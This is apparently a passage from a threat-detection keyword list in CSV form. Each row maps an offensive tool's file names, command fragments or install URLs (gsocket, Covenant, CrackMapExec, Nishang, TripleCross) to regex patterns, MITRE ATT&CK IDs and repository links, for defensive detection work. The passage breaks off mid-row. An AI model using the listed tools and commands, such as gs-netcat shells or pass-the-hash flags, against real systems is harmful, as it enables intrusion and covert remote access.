"*Group3r.exe*",".{0,1000}Group3r\.exe.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*GruntInjection.exe*",".{0,1000}GruntInjection\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*gruntstager.cs*",".{0,1000}gruntstager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*GruntStager.exe*",".{0,1000}GruntStager\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*GS_NETCAT_BIN*",".{0,1000}GS_NETCAT_BIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*G-Security Webshell*",".{0,1000}G\-Security\sWebshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*gs-helloworld gs-pipe gs-full-pipe*",".{0,1000}gs\-helloworld\sgs\-pipe\sgs\-full\-pipe.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-mount ~/*",".{0,1000}gs\-mount\s\~\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-mount -s*",".{0,1000}gs\-mount\s\-s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat &*",".{0,1000}gs\-netcat\s\&.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat.1*",".{0,1000}gs\-netcat\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket openvpn *",".{0,1000}gsocket\sopenvpn\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket*/gsocket.h*",".{0,1000}gsocket.{0,1000}\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET*Lclient_gs.log*",".{0,1000}GSOCKET.{0,1000}Lclient_gs\.log.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.1.html*",".{0,1000}gsocket\.1\.html.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.io/install.sh*",".{0,1000}gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_1.*.deb*",".{0,1000}gsocket_1\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_ARGS=*",".{0,1000}GSOCKET_ARGS\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-aarch64.tar.gz*",".{0,1000}gsocket_linux\-aarch64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-arm.tar.gz*",".{0,1000}gsocket_linux\-arm\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-armv6.tar.gz*",".{0,1000}gsocket_linux\-armv6\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-armv7l.tar.gz*",".{0,1000}gsocket_linux\-armv7l\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-i686.tar.gz*",".{0,1000}gsocket_linux\-i686\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mips32.tar.gz*",".{0,1000}gsocket_linux\-mips32\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mips64.tar.gz*",".{0,1000}gsocket_linux\-mips64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mipsel.tar.gz*",".{0,1000}gsocket_linux\-mipsel\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-x86_64.tar.gz*",".{0,1000}gsocket_linux\-x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_openbsd-x86_x64.tar.gz*",".{0,1000}gsocket_openbsd\-x86_x64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_IP=*",".{0,1000}GSOCKET_SOCKS_IP\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_PORT=*",".{0,1000}GSOCKET_SOCKS_PORT\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-1.*.tar.gz*",".{0,1000}gsocket\-1\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-tor/*",".{0,1000}gsocket\-tor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-tor\*",".{0,1000}gsocket\-tor\\.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-root-shell-key.txt*",".{0,1000}gs\-root\-shell\-key\.txt.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-sftp -*",".{0,1000}gs\-sftp\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gtfobins*",".{0,1000}gtfobins.{0,1000}","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*GTFOBLookup*",".{0,1000}GTFOBLookup.{0,1000}","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","237","39","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" "*gtfonow.py -a*",".{0,1000}gtfonow\.py\s\-a.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gtworek/Priv2Admin*",".{0,1000}gtworek\/Priv2Admin.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*guardicore*monkey*",".{0,1000}guardicore.{0,1000}monkey.{0,1000}","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*guardicore/monkey*",".{0,1000}guardicore\/monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*Guest User Policy: Guest users have the same access as members (most inclusive)*",".{0,1000}Guest\sUser\sPolicy\:\sGuest\susers\shave\sthe\ssame\saccess\sas\smembers\s\(most\sinclusive\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*guida.exe -*",".{0,1000}guida\.exe\s\-.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*gunicorn ares:app*",".{0,1000}gunicorn\sares\:app.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*gustanini/PowershellTools*",".{0,1000}gustanini\/PowershellTools.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*",".{0,1000}Gw3kg8e3ej4ai9wffn\%2Fd0uRqKzyaPfM2UFq\%2F8dWmoW4wnyKZhx07Bg\=\=.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*-H lm-hash:nt-hash*",".{0,1000}\-H\slm\-hash\:nt\-hash.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*-H 'LMHASH:NTHASH'*",".{0,1000}\-H\s\'LMHASH\:NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*-H 'NTHASH'*",".{0,1000}\-H\s\'NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*h2csmuggler --scan-list *",".{0,1000}h2csmuggler\s\-\-scan\-list\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h2csmuggler -x * --test*",".{0,1000}h2csmuggler\s\-x\s.{0,1000}\s\-\-test.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd*",".{0,1000}h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*h3xduck/TripleCross*",".{0,1000}h3xduck\/TripleCross.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*h4ntu shell [powered by tsoi]*",".{0,1000}h4ntu\sshell\s\[powered\sby\stsoi\].{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*H4sIAAAAAAAEACVQ30vDMBB*",".{0,1000}H4sIAAAAAAAEACVQ30vDMBB.{0,1000}","offensive_tool_keyword","PSMapExec","A 